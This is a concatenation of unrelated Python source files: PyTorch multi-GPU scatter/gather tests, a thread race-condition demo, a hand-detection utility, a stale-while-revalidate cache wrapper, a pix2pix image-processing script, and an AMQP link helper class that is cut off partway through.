with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
11_race_condition_problem.py
|
from logging_utils import info, THREAD_FORMAT
import logging
import threading
logging.basicConfig(level=logging.DEBUG, format=THREAD_FORMAT)
BALANCE = 0
def deposit() -> None:
global BALANCE
for _ in range(0, 1000000):
BALANCE += 10
def withdrawal() -> None:
global BALANCE
for _ in range(0, 1000000):
BALANCE -= 10
if __name__ == '__main__':
thread1 = threading.Thread(target=deposit)
thread2 = threading.Thread(target=withdrawal)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
info(f"Total balance: {BALANCE}")
|
detector_utils.py
|
# Utilities for object detector.
import sys
import cv2
import os
import numpy as np
import tensorflow as tf
from threading import Thread
from datetime import datetime
from utils import label_map_util
from collections import defaultdict
from utils import circlemanager
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# Draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
maxSize = 0
result = None
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (255, 255, 255), 3, 1)
# Left top corner, right bottom corner
# print("Testing: " + str(left) + "," + str(top) + " " + str(right) + "," + str(bottom))
if ((right - left) * (bottom - top) > maxSize):
maxSize = (right - left) * (bottom - top)
result = ((int)((left + right)/2) ,(int)((top + bottom)/2))
return result
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
asdf = None;
#cv2.putText(image_np, fps, (20, 50),
#cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 255, 255), 2)
# Practice line
def draw_base_lines_on_image(x, y, image_np):
# Horizontal line
color = (255, 255, 255)
initialX = (int)(x / 4)
thirdOfY = (int)(2 * y / 3)
cv2.line(image_np, (0, thirdOfY), (x, thirdOfY), color, 3)
# Vertical lines
cv2.line(image_np, (initialX, thirdOfY), (initialX, y), color, 3)
cv2.line(image_np, (initialX * 2, thirdOfY), (initialX * 2, y), color, 3)
cv2.line(image_np, (initialX * 3, thirdOfY), (initialX * 3, y), color, 3)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
swr_cached.py
|
from threading import Thread
from typing import Any, Optional
from .base import Api
from .cached import CachedApi
class SwrCachedApi(CachedApi):
"""SWR Cached API - Wraps an API to provide stale-while-revalidate caching.
Caches the response for `cache_time_in_seconds` seconds. After which,
subsequent calls to `fetch_latest` will kick off a refresh in the background
but will return the stale cached value without blocking.
Parameters
----------
api : Api
The wrapped API
cache_time_in_seconds: int
The number of seconds to cache the response
"""
def __init__(self, api: Api, cache_time_in_seconds: int) -> None:
super().__init__(api, cache_time_in_seconds)
self.thread = None # type: Optional[Thread]
def fetch_latest(self) -> Any:
if not self.cached_response:
self.refresh()
elif self.is_stale() and not self.is_refreshing():
self.start_background_refresh()
return self.cached_response
def is_refreshing(self) -> bool:
if self.thread:
return self.thread.is_alive()
return False
def start_background_refresh(self) -> None:
self.thread = Thread(target=self.refresh)
self.thread.start()
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main_progress():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
def main():
t = threading.Thread(target =main_progress, name = "main_p")
t.start()
main()
|
AmqpLink.py
|
# Copyright (c) 2019 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-IoticAgent/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
from sys import version_info, exc_info
try:
BlockingIOError
except NameError:
# Python < 2.7.9 & < 3.4
from io import BlockingIOError # pylint: disable=redefined-builtin
from ssl import SSLError
from threading import Thread
from socket import timeout as SocketTimeout
from ..third.amqp import Connection, Message, exceptions
from .Profiler import profiled_thread
from .compat import raise_from, Event, RLock, monotonic, SocketError
from .utils import EventWithChangeTimes, validate_nonnegative_int
from .Exceptions import LinkException
DEBUG_ENABLED = logger.isEnabledFor(logging.DEBUG)
class AmqpLink(object): # pylint: disable=too-many-instance-attributes
"""Helper class to deal with AMQP connection.
"""
def __init__(self, host, vhost, prefix, epid, passwd, msg_callback, ka_callback, # pylint: disable=too-many-locals
send_ready_callback, sslca=None, prefetch=128, ackpc=0.5, heartbeat=30, socket_timeout=10,
startup_ignore_exc=False, conn_retry_delay=5, conn_error_log_threshold=180):
"""
`host`: Broker 'host:port'
`vhost`: Virtualhost name
`prefix`: username prefix for amqp login
`epid`: entity process ID
`passwd`: password
`msg_callback`: function callback for messages. Arguments: message
`ka_callback`: function callback for keepalives, Arguments: none
`send_ready_callback`: callback on send thread readiness. Arguments: last disconnection time
`sslca`: Server Certificate
`prefetch` max number of messages to get on amqp connection drain
`ackpc` 1..0 (percentage) maximum fraction (of prefetch) of unacknowledged messages
`heartbeat` How often (in seconds) to send AMQP heartbeat
`socket_timeout` Timeout of underlying sockets both for connection and subsequent operations
`startup_ignore_exc` On startup only, whether to ignore exceptions until socket_timeout has elapsed. This means
that e.g. an access-refused will result in a retry on startup (assuming `socket_timeout`
seconds haven't elapsed yet) rather than immediately failing.
`conn_retry_delay` How long (in seconds) to wait inbetween re-connection attempts when connection to broker is
lost
`conn_error_log_threshold` How long (in seconds) to delay logging connection failures at ERROR level. Until said
threshold is reached, the error messages will be logged at WARNING level.
"""
self.__host = host
self.__vhost = vhost
self.__prefix = prefix
self.__epid = epid
self.__passwd = passwd
#
self.__msg_callback = msg_callback
self.__ka_callback = ka_callback
self.__send_ready_callback = send_ready_callback
#
self.__sslca = sslca
self.__prefetch = prefetch
self.__ackpc = ackpc
self.__ack_threshold = self.__prefetch * self.__ackpc
self.__heartbeat = heartbeat
self.__socket_timeout = validate_nonnegative_int(socket_timeout, 'socket_timeout', allow_zero=False)
#
self.__unacked = 0
self.__last_id = None
#
self.__end = Event()
self.__recv_ready = EventWithChangeTimes()
self.__recv_thread = None
self.__send_ready = EventWithChangeTimes()
self.__send_lock = RLock()
self.__send_channel = None
self.__ka_channel = None
self.__send_thread = None
self.__send_exc_time = None
self.__send_exc = None # Used to pass exceptions to blocking calls EG .start
self.__recv_exc = None
# Whether to only rely on timeout on startup
self.__startup_ignore_exc = bool(startup_ignore_exc)
self.__conn_retry_delay = validate_nonnegative_int(conn_retry_delay, 'conn_retry_delay', allow_zero=False)
self.__conn_error_log_threshold = validate_nonnegative_int(conn_error_log_threshold, 'conn_error_log_threshold',
allow_zero=False)
def start(self):
"""start connection threads, blocks until started
"""
if not (self.__recv_thread or self.__send_thread):
self.__end.clear()
self.__send_ready.clear()
self.__recv_ready.clear()
timeout = self.__socket_timeout + 1
ignore_exc = self.__startup_ignore_exc
self.__send_exc_clear()
self.__recv_exc_clear()
# start & await send thread success (unless timeout reached or an exception has occured)
self.__send_thread = Thread(target=self.__send_run, name='amqplink_send')
self.__send_thread.start()
start_time = monotonic()
success = False
while not (success or (not ignore_exc and self.__send_exc) or monotonic() - start_time > timeout):
success = self.__send_ready.wait(.25)
if success:
# start & await receiver thread success
self.__recv_thread = Thread(target=self.__recv_run, name='amqplink_recv')
self.__recv_thread.start()
start_time = monotonic()
success = False
while not (success or (not ignore_exc and self.__recv_exc) or monotonic() - start_time >= timeout):
success = self.__recv_ready.wait(.25)
# handler either thread's failure
if not success:
logger.warning("AmqpLink Failed to start. Giving up.")
self.stop()
if self.__recv_exc:
# prioritise receive thread since this can get access-denied whereas send does not (until sending)
raise_from(LinkException('Receive thread failure'), self.__recv_exc)
elif self.__send_exc:
raise_from(LinkException('Send thread failure'), self.__send_exc)
else:
raise LinkException('Unknown link failure (timeout reached)')
else:
raise LinkException('amqplink already started')
def is_alive(self):
"""Helper function to show if send & recv Threads are running
"""
if self.__send_ready.is_set() and self.__recv_ready.is_set():
if self.__send_thread is not None and self.__recv_thread is not None:
return self.__send_thread.is_alive() and self.__recv_thread.is_alive()
return False
def stop(self):
"""disconnect, blocks until stopped
"""
self.__end.set()
if self.__recv_thread:
self.__recv_thread.join()
self.__recv_thread = None
if self.__send_thread:
self.__send_thread.join()
self.__send_thread = None
@property
def last_send_exc_time(self):
"""Timestamp (or None) at which send thread last failed
"""
return self.__send_exc_time
def __del__(self):
self.stop()
def send(self, body, content_type='application/ubjson', timeout=5):
"""timeout indicates amount of time to wait for sending thread to be ready. set to larger than zero to wait
(in seconds, fractional) or None to block.
"""
if self.__send_ready.wait(timeout):
try:
with self.__send_lock:
# access denied response might be received inside send thread rather than here how to best handle?
self.__send_channel.basic_publish(msg=Message(body, delivery_mode=2, content_type=content_type),
exchange=self.__epid)
except exceptions.AccessRefused as exc:
raise_from(LinkException('Access denied'), exc)
except (exceptions.AMQPError, SocketError) as exc:
raise_from(LinkException('amqp/transport failure'), exc)
except Exception as exc: # pylint: disable=broad-except
raise_from(LinkException('unexpected failure'), exc)
else:
exc = self.__send_exc
if exc:
raise_from(LinkException('Sender unavailable'), exc)
else:
raise LinkException('Sender unavailable (unknown error)')
@classmethod
def __get_ssl_context(cls, sslca=None):
"""Make an SSLConext for this Python version using public or sslca
"""
if ((version_info[0] == 2 and (version_info[1] >= 7 and version_info[2] >= 5)) or
(version_info[0] == 3 and version_info[1] >= 4)):
logger.debug('SSL method for 2.7.5+ / 3.4+')
# pylint: disable=no-name-in-module,import-outside-toplevel
from ssl import SSLContext, PROTOCOL_TLSv1_2, CERT_REQUIRED, OP_NO_COMPRESSION
ctx = SSLContext(PROTOCOL_TLSv1_2)
ctx.set_ciphers('HIGH:!SSLv3:!TLSv1:!aNULL:@STRENGTH')
# see CRIME security exploit
ctx.options |= OP_NO_COMPRESSION
# the following options are used to verify the identity of the broker
if sslca:
ctx.load_verify_locations(sslca)
ctx.verify_mode = CERT_REQUIRED
ctx.check_hostname = False
else:
# Verify public certifcates if sslca is None (default)
from ssl import Purpose # pylint: disable=no-name-in-module,import-outside-toplevel
ctx.load_default_certs(purpose=Purpose.SERVER_AUTH)
ctx.verify_mode = CERT_REQUIRED
ctx.check_hostname = True
elif version_info[0] == 3 and version_info[1] < 4:
logger.debug('Using SSL method for 3.2+, < 3.4')
# pylint: disable=no-name-in-module,import-outside-toplevel
from ssl import SSLContext, CERT_REQUIRED, PROTOCOL_SSLv23, OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_TLSv1
ctx = SSLContext(PROTOCOL_SSLv23)
ctx.options |= (OP_NO_SSLv2 | OP_NO_SSLv3 | OP_NO_TLSv1)
ctx.set_ciphers('HIGH:!SSLv3:!TLSv1:!aNULL:@STRENGTH')
# the following options are used to verify the identity of the broker
if sslca:
ctx.load_verify_locations(sslca)
ctx.verify_mode = CERT_REQUIRED
else:
# Verify public certifcates if sslca is None (default)
ctx.set_default_verify_paths()
ctx.verify_mode = CERT_REQUIRED
else:
raise Exception("Unsupported Python version %s" % '.'.join(str(item) for item in version_info[:3]))
return ctx
def __recv_ka_cb(self, msg):
try:
if self.__recv_ready.wait(2):
self.__ka_channel.basic_publish(msg=Message(b'', delivery_mode=1), routing_key='keep-alive',
exchange=self.__epid)
else:
logger.warning('Recv thread not ready in 2 seconds, not sending KA response')
except:
logger.warning('Failed to send KA response')
try:
self.__ka_callback()
except:
logger.exception("__recv_ka_cb exception ignored.")
def __recv_cb(self, msg):
"""Calls user-provided callback and marks message for Ack regardless of success
"""
try:
self.__msg_callback(msg)
except:
logger.exception("AmqpLink.__recv_cb exception calling msg_callback")
finally:
# only works if all messages handled in series
self.__last_id = msg.delivery_tag
self.__unacked += 1
@profiled_thread # noqa (complexity)
def __recv_run(self): # pylint: disable=too-many-branches,too-many-statements
"""Main receive thread/loop
"""
while not self.__end.is_set():
self.__unacked = 0
self.__last_id = None
try:
self.__recv_ready.clear() # Ensure event is cleared for EG network failure/retry loop
with Connection(userid=self.__prefix + self.__epid,
password=self.__passwd,
virtual_host=self.__vhost,
heartbeat=self.__heartbeat,
connect_timeout=self.__socket_timeout,
operation_timeout=self.__socket_timeout,
ssl=self.__get_ssl_context(self.__sslca),
host=self.__host) as conn,\
conn.channel(auto_encode_decode=False) as channel_data,\
conn.channel() as channel_ka:
logger.debug('Connected, using cipher %s', conn.transport.sock.cipher()[0])
channel_data.basic_qos(prefetch_size=0, prefetch_count=self.__prefetch, a_global=False)
# exclusive=True. There can be only one (receiver)
msgtag = channel_data.basic_consume(queue=self.__epid, exclusive=True, callback=self.__recv_cb)
acktag = channel_ka.basic_consume(queue=('%s_ka' % self.__epid), exclusive=True, no_ack=True,
callback=self.__recv_ka_cb)
self.__ka_channel = channel_ka
self.__recv_exc_clear(log_if_exc_set='reconnected')
self.__recv_ready.set()
try:
#
# Drain loop
while not self.__end.is_set():
try:
while not self.__end.is_set() and self.__unacked < self.__ack_threshold:
# inner loop to handle all outstanding amqp messages
conn.drain_events(.1)
except SocketTimeout:
pass
# either have waited for .1s or threshold reached, so always ack
if self.__unacked:
logger.debug('acking (%d) up to %s', self.__unacked, self.__last_id)
channel_data.basic_ack(self.__last_id, multiple=True)
self.__unacked = 0
conn.heartbeat_tick()
finally:
self.__recv_ready.clear()
try:
channel_data.basic_cancel(msgtag)
channel_ka.basic_cancel(acktag)
except:
pass
except exceptions.AccessRefused:
self.__recv_log_set_exc_and_wait('Access Refused (Credentials already in use?)')
except exceptions.ConnectionForced:
self.__recv_log_set_exc_and_wait('Disconnected by broker (ConnectionForced)')
except SocketTimeout:
self.__recv_log_set_exc_and_wait('SocketTimeout exception. wrong credentials, vhost or prefix?')
except SSLError:
self.__recv_log_set_exc_and_wait('ssl.SSLError Bad Certificate?')
except (exceptions.AMQPError, SocketError):
self.__recv_log_set_exc_and_wait('amqp/transport failure, sleeping before retry')
except:
self.__recv_log_set_exc_and_wait('unexpected failure, exiting', wait_seconds=0)
break
logger.debug('finished')
def __recv_log_set_exc_and_wait(self, msg, wait_seconds=None):
"""Equivalent to __send_log_set_exc_and_wait but for receiver thread"""
logger.log(
(
logging.ERROR if self.__recv_ready.time_since_last_clear >= self.__conn_error_log_threshold else
logging.WARNING
),
msg,
exc_info=DEBUG_ENABLED
)
self.__recv_exc = exc_info()[1]
self.__end.wait(self.__conn_retry_delay if wait_seconds is None else wait_seconds)
def __recv_exc_clear(self, log_if_exc_set=None):
"""Equivalent to __send_exc_clear"""
if not (log_if_exc_set is None or self.__recv_exc is None):
logger.info(log_if_exc_set)
self.__recv_exc = None
@profiled_thread # noqa (complexity)
